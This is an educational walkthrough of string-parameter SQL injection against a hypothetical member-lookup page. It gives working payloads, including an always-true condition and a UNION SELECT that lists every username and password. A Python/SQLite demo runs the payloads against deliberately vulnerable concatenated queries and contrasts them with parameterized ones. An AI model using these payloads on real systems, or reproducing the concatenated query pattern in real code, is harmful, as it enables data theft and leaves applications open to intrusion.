String Parameter Injection Example


Let's suppose the page we are testing has a GET parameter named username. When loaded, it displays the full name and email of the specified member. Here is what the URL looks like when a regular request is made.

REAL USERNAME PARAMETER IN URL.
http://www.victim.com/viewMember.php?username=admin
And now an overview of what happens in the page’s script.
BUILDING THE QUERY WITHOUT SANITIZING INPUT.
$sql = "SELECT id, username, first_name, last_name, email FROM members WHERE username='".$_GET['username']."'";

QUERY GENERATED (THIS QUERY IS EXECUTED).
SELECT id, username, first_name, last_name, email FROM members WHERE username='admin'
The user input is concatenated into the query as is, so the attacker can insert SQL fragments and manipulate the WHERE clause. Before gaining control over the query, however, he must terminate the string literal the parameter is placed in, and he must also deal with the original closing quote so that the resulting SQL stays valid. Let's see how it is done.

Closing Quote

Since no input sanitizing is done, the first single quote appearing in the input is treated as the closing quote of the string literal, and everything after it is parsed as SQL.
PARAMETER SUBMITTED BY THE ATTACKER (ADDING A CLOSING QUOTE).
admin'

QUERY GENERATED (INVALID SQL SYNTAX).
SELECT id, username, first_name, last_name, email FROM members WHERE username='admin''

Trailing Quote

The last query is invalid because of the leftover single quote. If the tester instead appends an always-true condition and omits its final quote, the original closing quote completes it and the SQL injection succeeds.
PARAMETER SUBMITTED BY THE ATTACKER (NOTICE THE MISSING LAST QUOTE).
admin' OR 'a'='a

QUERY GENERATED (VALID QUERY).
SELECT id, username, first_name, last_name, email FROM members WHERE username='admin' OR 'a'='a'
By making the WHERE clause always true, the attacker will view information about all users at once. In this example that is only a minor issue, since the page already discloses that data to anyone who knows a username. The real problem is that the attacker now controls the query, and here is what he could have done instead.
MALICIOUS PARAMETER.
invalid-username' UNION SELECT 1, username, passwords, 4, 5 FROM members WHERE 'x'='x

QUERY GENERATED.
SELECT id, username, first_name, last_name, email FROM members WHERE username='invalid-username' UNION SELECT 1, username, passwords, 4, 5 FROM members WHERE 'x'='x'
As you can guess, this lists every username and password in the database. Two details make it work: the bogus username makes the original SELECT return no rows, so only the attacker's rows are displayed, and the UNION SELECT must return the same number of columns as the original query (five here, hence the filler values 1, 4 and 5), otherwise the database rejects the statement. This technique is detailed in the SQL injection UNION attacks article.
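The following is an added example, not code from the original page: a Python/SQLite stand-in for the PHP script above that builds the query by string concatenation exactly as viewMember.php does, runs each of the payloads discussed (the lone closing quote, the always-true condition and the UNION), and contrasts them with a parameterized query. The members table, its rows and the passwords column are constructed here for illustration; the column name passwords follows the page and is hypothetical.

```python
import sqlite3

# Constructed sample data standing in for the page's "members" table.
# Plaintext passwords are kept only to mirror the page's example; real
# applications must store password hashes.
MEMBERS = [
    (1, "admin", "Ada", "Lovelace", "admin@victim.example", "adm1n-secret"),
    (2, "bob", "Bob", "Builder", "bob@victim.example", "hunter2"),
    (3, "carol", "Carol", "Danvers", "carol@victim.example", "p@ssw0rd"),
]


def make_db():
    """Create an in-memory SQLite database with the constructed members table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE members (id INTEGER, username TEXT, first_name TEXT, "
        "last_name TEXT, email TEXT, passwords TEXT)"
    )
    conn.executemany("INSERT INTO members VALUES (?, ?, ?, ?, ?, ?)", MEMBERS)
    return conn


def build_vulnerable_query(username):
    """Mirror the PHP line on the page: the GET parameter is concatenated as-is."""
    return (
        "SELECT id, username, first_name, last_name, email FROM members "
        "WHERE username='" + username + "'"
    )


def run_vulnerable(conn, username):
    """Execute the concatenated query; return the rows, or the SQL error text."""
    try:
        return conn.execute(build_vulnerable_query(username)).fetchall()
    except sqlite3.Error as exc:
        return "SQL error: " + str(exc)


def run_parameterized(conn, username):
    """Hardened form: the driver binds the value, so quotes inside it stay data."""
    return conn.execute(
        "SELECT id, username, first_name, last_name, email FROM members "
        "WHERE username=?",
        (username,),
    ).fetchall()


# The payloads from the page, plus one with the wrong UNION column count to
# show why the filler values matter.
PAYLOADS = {
    "regular": "admin",
    "closing_quote": "admin'",
    "always_true": "admin' OR 'a'='a",
    "union_bad_column_count": (
        "invalid-username' UNION SELECT 1, username, passwords "
        "FROM members WHERE 'x'='x"
    ),
    "union": (
        "invalid-username' UNION SELECT 1, username, passwords, 4, 5 "
        "FROM members WHERE 'x'='x"
    ),
}


def demo():
    """Run every payload through both query builders; return the results by name."""
    conn = make_db()
    results = {}
    for name, payload in PAYLOADS.items():
        results[name] = {
            "query": build_vulnerable_query(payload),
            "vulnerable": run_vulnerable(conn, payload),
            "parameterized": run_parameterized(conn, payload),
        }
    return results


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"== {name}")
        print("   query:         ", outcome["query"])
        print("   vulnerable:    ", outcome["vulnerable"])
        print("   parameterized: ", outcome["parameterized"])
```

With the concatenated query, the lone quote produces a syntax error, the always-true payload returns all three members, the UNION with three columns is rejected by SQLite for the column-count mismatch, and the five-column UNION returns every password in the third column. The parameterized version returns exactly one row for admin and nothing for any of the payloads, because the whole parameter is compared as a literal username.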
